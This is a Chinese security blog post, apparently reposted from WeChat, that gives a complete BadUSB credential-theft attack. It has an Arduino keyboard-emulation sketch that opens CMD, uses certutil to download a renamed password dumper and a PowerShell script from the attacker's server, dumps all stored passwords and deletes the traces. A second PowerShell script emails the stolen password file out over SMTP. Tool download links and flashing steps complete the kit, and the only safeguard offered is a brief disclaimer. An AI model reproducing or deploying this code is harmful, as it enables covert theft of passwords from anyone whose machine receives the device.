BadUsB自动下载脚本获取本地所有密*码并发送到邮箱-GetPass

admin
admin
admin
108724
文章
90
评论
2024年6月4日10:16:57评论25 views字数 2470阅读8分14秒阅读模式
  
点击上方蓝字 关注【渗透测试】不迷路

 

    月黑风高逛FreeBuf看到前两年写的文章被下架了,下架原因"内容敏感请补充防护建议"想了想把它搬过来吧,记录一下曾经,不喜勿喷,大佬轻喷

BadUsB自动下载脚本获取本地所有密*码并发送到邮箱-GetPass

涉及工具

Arduino IDE(烧录工具)
BadUsB(实体设备)
LaZagne(主机密码获取工具)
PowerShell(系统自带)
邮箱的授权码(外连接收)

工具获取方式

工具:https://www.lanzoue.com/b0hc1t00f密码:1t5f
https://github.com/Axx8/GetPass

 

前言

中心思想:目标主机插入BadUsB设备自动获取到当前的所有密码写到文件然后发送到邮箱中。

世界上最邪恶的USB设备

我这个小菜鸡大致理解如下:

设备名称叫BadUsB,它不同于U盘里携带的病毒,严格来说BadUsB不算是U盘,它也不提供存储的功能。但是正因为它将恶意代码置于硬件中,使得杀毒软件以及U盘格式化等防范措施都对它无效。

这里就放大佬总结的BadUSB详细介绍:https://www.baidu.com/baidu?ie=utf-8&wd=BadUSB%E8%AF%A6%E7%BB%86%E4%BB%8B%E7%BB%8D

BadUsB自动下载脚本获取本地所有密*码并发送到邮箱-GetPass

演示

此处演示本来录的视频来自,由于部分敏感信息限制,这里直接放运行过程截图了。

BadUsB自动下载脚本获取本地所有密*码并发送到邮箱-GetPass

查看邮件

BadUsB自动下载脚本获取本地所有密*码并发送到邮箱-GetPass

BadUsB自动下载脚本获取本地所有密*码并发送到邮箱-GetPass

仅用于技术交流,请勿用于非法用途

代码在下方!!!!!!!

自动获取目标主机所有密码的脚本GetPass.ino

#include<Keyboard.h>void setup(){  Keyboard.begin();//初始化键盘通讯  delay(5000);//延时  Keyboard.press(KEY_LEFT_GUI);//win键  Keyboard.press('r');//r键  delay(500);  Keyboard.release(KEY_LEFT_GUI);  Keyboard.release('r');  Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法  Keyboard.release(KEY_CAPS_LOCK);  delay(500);  Keyboard.println("CMD");  delay(1000);  Keyboard.println("certutil -urlcache -split -f http:<YOU VPS>/KissGeek/PASSTOOLS.EXE d:\setup_11.5.0.exe");//下载密码截取工具,因为开启了大小写混淆所以说这里要大写  delay(10000);  Keyboard.println("certutil -urlcache -split -f http:<YOU VPS>/KissGeek/PassUp.PS1 d:\setup_11.5.0.PS1");//下载powershell脚本  delay(1000);  Keyboard.println("d:\SETUP_11.5.0.EXE ALL > d:\pass.txt");//获取的密码放到pass.txt  delay(500);  Keyboard.println("POWERSHELL d:\SETUP_11.5.0.PS1");  Keyboard.println("DEL d:\pass.txt,d:\setup_11.5.0.PS1,d:\setup_11.5.0.exe");//删除程序  Keyboard.println("EXIT");//退出powershell  Keyboard.println("EXIT");//退出cmd  Keyboard.press(KEY_CAPS_LOCK);  Keyboard.release(KEY_CAPS_LOCK);  Keyboard.end();//结束键盘通讯}void loop() {}

把获取到的密码发送到邮箱的脚本 PassUP.ps1(PowerShell)

$SMTPServer = 'smtp.qq.com'$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)$SMTPInfo.EnableSsl = $true$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('你的邮箱', '邮箱密钥');$ReportEmail = New-Object System.Net.Mail.MailMessage$ReportEmail.From = '你的邮箱'$ReportEmail.To.Add('你的邮箱')$ReportEmail.Subject = 'GetPass'$ReportEmail.Body = 'Passwords In Applications'$ReportEmail.Attachments.Add('F:pass.txt')$SMTPInfo.Send($ReportEmail)attrib +h pass.txt

无法运行ps1脚本时需要管理员方式运行powershell然后输入:

set-ExecutionPolicy RemoteSigned

烧录软件

这里使用的是:Arduino IDE 1.8.12(可以使用最新版)

https://www.arduino.cn/thread-5838-1-1.html

安装完成后,打开Arduino IDE 选择“工具”-->"开发板"-->"Arduino Leonaedo",选择BadUsB设备的"端口"
烧录前选择好自己的板和端口,点击左上角的✔ 验证代码的完整性可用性,点击旁边的上传按钮将代码烧录到BadUsB设备。

BadUsB自动下载脚本获取本地所有密*码并发送到邮箱-GetPass

烧录完成后当目标主机插入后自动运行BadUsB设备里的脚本。

免责声明

该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果。

 

原文始发于微信公众号(渗透测试):BadUsB自动下载“脚本”获取本地所有密*码并发送到邮箱,文末送BadUsB设备!!!

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月4日10:16:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   BadUsB自动下载脚本获取本地所有密*码并发送到邮箱-GetPasshttps://cn-sec.com/archives/2812355.html

发表评论

匿名网友 填写信息